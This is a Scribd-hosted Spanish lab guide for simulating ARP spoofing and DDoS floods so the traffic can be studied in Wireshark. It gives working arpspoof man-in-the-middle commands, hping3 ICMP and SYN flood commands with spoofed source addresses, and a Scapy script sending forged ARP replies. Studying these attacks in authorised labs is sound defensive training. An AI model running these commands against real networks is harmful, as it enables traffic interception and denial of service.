0% encontró este documento útil (0 votos)
6 vistas3 páginas

Simulación de ARP Spoofing y DDoS en Wireshark

El documento proporciona una guía sobre cómo simular ataques de ARP spoofing y DDoS en un entorno controlado utilizando herramientas como arpspoof y hping3, con el objetivo de analizar los paquetes en Wireshark. Se enfatiza la importancia de realizar estas pruebas en redes cerradas y con autorización para evitar consecuencias legales. Además, se ofrecen consejos para el uso de Wireshark y la creación de paquetes personalizados con Scapy.

Cargado por

andres raba
Derechos de autor
© All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como DOCX, PDF, TXT o lee en línea desde Scribd
0% encontró este documento útil (0 votos)
6 vistas3 páginas

Simulación de ARP Spoofing y DDoS en Wireshark

El documento proporciona una guía sobre cómo simular ataques de ARP spoofing y DDoS en un entorno controlado utilizando herramientas como arpspoof y hping3, con el objetivo de analizar los paquetes en Wireshark. Se enfatiza la importancia de realizar estas pruebas en redes cerradas y con autorización para evitar consecuencias legales. Además, se ofrecen consejos para el uso de Wireshark y la creación de paquetes personalizados con Scapy.

Cargado por

andres raba
Derechos de autor
© All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como DOCX, PDF, TXT o lee en línea desde Scribd

Simular paquetes sospechosos como ARP spoofing o DDoS desde un computador para

analizarlos con Wireshark puede ser útil para pruebas de ciberseguridad, laboratorios o
capacitación. A continuación, te explico cómo puedes hacerlo de forma controlada y segura
en un entorno de pruebas.

⚠️IMPORTANTE: Todo esto debe realizarse en un entorno cerrado y controlado, como


una red virtual o laboratorio local. Hacerlo en una red pública o sin autorización es ilegal y
puede tener consecuencias graves.

🔧 Requisitos generales

 Una máquina física o virtual con Linux (Kali Linux es ideal, pero Ubuntu también
sirve).
 Otra máquina víctima (real o virtual).
 Conexión a la misma red.
 Wireshark instalado.
 Opcional: herramientas como arpspoof, hping3, ettercap, scapy.

✅ 1. Simular ARP Spoofing


🛠 Herramienta: arpspoof (incluida en Kali Linux o instalable con dsniff)

🔌 Pasos:

1. Enciende Wireshark en la máquina víctima.


2. En el atacante (Kali, por ejemplo):

bash
CopiarEditar
sudo arpspoof -i eth0 -t [IP_VÍCTIMA] [IP_GATEWAY]
sudo arpspoof -i eth0 -t [IP_GATEWAY] [IP_VÍCTIMA]

Esto envía paquetes ARP falsos para hacerse pasar por el gateway ante la víctima y
viceversa (man-in-the-middle).

🔍 Qué verás en Wireshark:

 Paquetes ARP con direcciones MAC incorrectas.


 Tráfico redirigido a través del atacante.
✅ 2. Simular ataque DDoS (flood de paquetes)
🛠 Herramienta: hping3

📌 Ejemplo: ICMP flood (Ping flood)

bash
CopiarEditar
sudo hping3 -1 --flood -a [Link] [Link]

 -1 → ICMP
 --flood → Enviar paquetes lo más rápido posible
 -a → IP spoofing

🔍 Qué verás en Wireshark:

 Alta cantidad de paquetes ICMP.


 Dirección IP falsa si se usa -a.
 Posibles pérdidas o respuestas lentas en la red.

Otros ejemplos:

 TCP SYN flood:

bash
CopiarEditar
sudo hping3 -S --flood -p 80 [Link]

✅ 3. Crear paquetes personalizados (más avanzado)


🛠 Herramienta: Scapy (Python)
python
CopiarEditar
from [Link] import *

packet = Ether()/ARP(op=2, pdst="[Link]", psrc="[Link]",


hwsrc="00:11:22:33:44:55")
sendp(packet, loop=1, inter=0.2)

Esto enviará paquetes ARP falsos cada 0.2 segundos.

📈 Consejos para Wireshark


 Usa filtros como:
o arp
o icmp
o [Link] == 1
o [Link] == [Link]
 Marca los paquetes sospechosos.
 Observa tablas ARP para ver cambios.

También podría gustarte